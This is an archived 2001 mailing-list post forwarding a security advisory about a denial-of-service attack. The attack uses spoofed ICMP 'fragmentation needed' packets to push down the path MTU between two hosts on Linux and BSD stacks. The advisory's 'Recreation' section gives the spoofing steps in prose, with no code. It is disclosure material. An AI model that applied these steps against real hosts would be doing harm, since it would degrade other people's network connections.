[iwar] FW: [NEWS] New Denial of Service attack exploits special ICMP flags

From: Robert W. Miller
From: snooker@iex.net
To: iwar@egroups.com
Thu, 18 Jan 2001 12:17:17 -0700

Messages sorted by: [ date ][ subject ][ author ][ recipient ]
Next message: From: Fred Cohen To: Information Warfare Mailing List "[iwar] News"
Previous message: From: Vernon Stagg To: "[iwar] Tech giants co-ordinate security efforts"

fc  Thu Jan 18 11:37:08 2001
Received: from 207.222.214.225
	by localhost with POP3 (fetchmail-5.1.0)
	for fc@localhost (single-drop); Thu, 18 Jan 2001 11:37:08 -0800 (PST)
Received: by multi33.netcomi.com for fc
 (with Netcom Interactive pop3d (v1.21.1 1998/05/07) Thu Jan 18 19:37:01 2001)
X-From_: snooker@iex.net  Thu Jan 18 13:36:40 2001
Received: from jk.egroups.com (jk.egroups.com [208.50.144.83])
	by multi33.netcomi.com (8.9.3/8.9.3) with SMTP id NAA07413
	for ; Thu, 18 Jan 2001 13:36:37 -0600
X-eGroups-Return: sentto-279987-895-979846601-fc=all.net@returns.onelist.com
Received: from [10.1.4.54] by jk.egroups.com with NNFMP; 18 Jan 2001 19:36:42 -0000
X-Sender: snooker@iex.net
X-Apparently-To: iwar@egroups.com
Received: (EGP: mail-7_0_1_2); 18 Jan 2001 19:36:40 -0000
Received: (qmail 4797 invoked from network); 18 Jan 2001 19:17:55 -0000
Received: from unknown (10.1.10.27) by l8.egroups.com with QMQP; 18 Jan 2001 19:17:55 -0000
Received: from unknown (HELO mail.iex.net) (192.156.196.5) by mta2 with SMTP; 18 Jan 2001 19:17:54 -0000
Received: from h2o4me (p74-s8.cos1-ras.iex.net [209.151.65.170]) by mail.iex.net (8.11.1/8.11.1) with SMTP id f0IJHQZ24999 for ; Thu, 18 Jan 2001 12:17:31 -0700 (MST)
To: 
Message-ID: 
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
From: "Robert W. Miller" 
MIME-Version: 1.0
Mailing-List: list iwar@egroups.com; contact iwar-owner@egroups.com
Delivered-To: mailing list iwar@egroups.com
Precedence: bulk
List-Unsubscribe: 
Date: Thu, 18 Jan 2001 12:17:17 -0700
Reply-To: iwar@egroups.com
Subject: [iwar] FW: [NEWS] New Denial of Service attack exploits special ICMP flags
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com


New Denial of Service attack exploits special ICMP flags
--------------------------------------------------------

SUMMARY

A new attack exploits two flags in ICMP packets and enables attackers to
considerably slow down connections between two remote hosts (where at
least one has the PMTU discovery enabled). This attack can be done using
spoofed TCP/IP packet to hide the real attacker.

DETAILS

Vulnerable systems:
Most TCP/IP stacks that support PMTU discovery. Most notably:
 * Linux
 * BSD


The path MTU discovery is used to optimize TCP/IP connection performance.
The stack takes a hash table with the MTU of other ends. When an ICMP
"fragmentation needed and DF set" reaches the stack, it perform a look-up
in the hash table, searching for the old MTU. It then looks at the size of
the quoted packet (inside the ICMP packet), and computes the new MTU.

This process opens a possibility for attack; it is possible to cause the
host to recalculate the MTU between two hosts even if it is not needed.

Recreation:
Lets take two hosts - A and B that use IP communications. Let say C - The
attacker - is able to spoof IP packets in the communication between A and
B.

C sends an ICMP echo request containing some data, where the source
address is set to A and the destination address is set to B.

B will now create a new entry in the hash table (if there isn't an old
one).

C Sends an ICMP "fragmentation needed and DF set", with the source address
set to A and the destination address set to B, quoting the ICMP echo-reply
response that we can guess (set the right TOS (usually 0x40) if you want
to make sure that this works).

B Sets the new MTU in relation to the quoted packet total length.

You may want to send these packets once every second, just to avoid
expires. In addition, it may be useful if the MSS TCP option has been set
to override the MTU (it shouldn't, but some implementations may do this),
otherwise you can send even less spoofed packets.

ADDITIONAL INFORMATION

The information has been provided by   antirez.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body
to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.

Det. Robert W. Miller
Colorado Internet Crimes Against
Children Task Force
Pueblo High Tech. Crime Unit
Pueblo County Sheriff's Office
320 S. Joe Martinez Blvd.
Pueblo West, CO. 81007
Tel (719)583-4736
FAX (719)583-4732
mailto:snooker@iex.net
mailto:cicactf@iex.net
http://www.co.pueblo.co.us/sheriff/
PGP key available at: http://pgpkeys.mit.edu:11371/
search on snooker@iex.net






------------------
http://all.net/

Next message: From: Fred Cohen To: Information Warfare Mailing List "[iwar] News"
Previous message: From: Vernon Stagg To: "[iwar] Tech giants co-ordinate security efforts"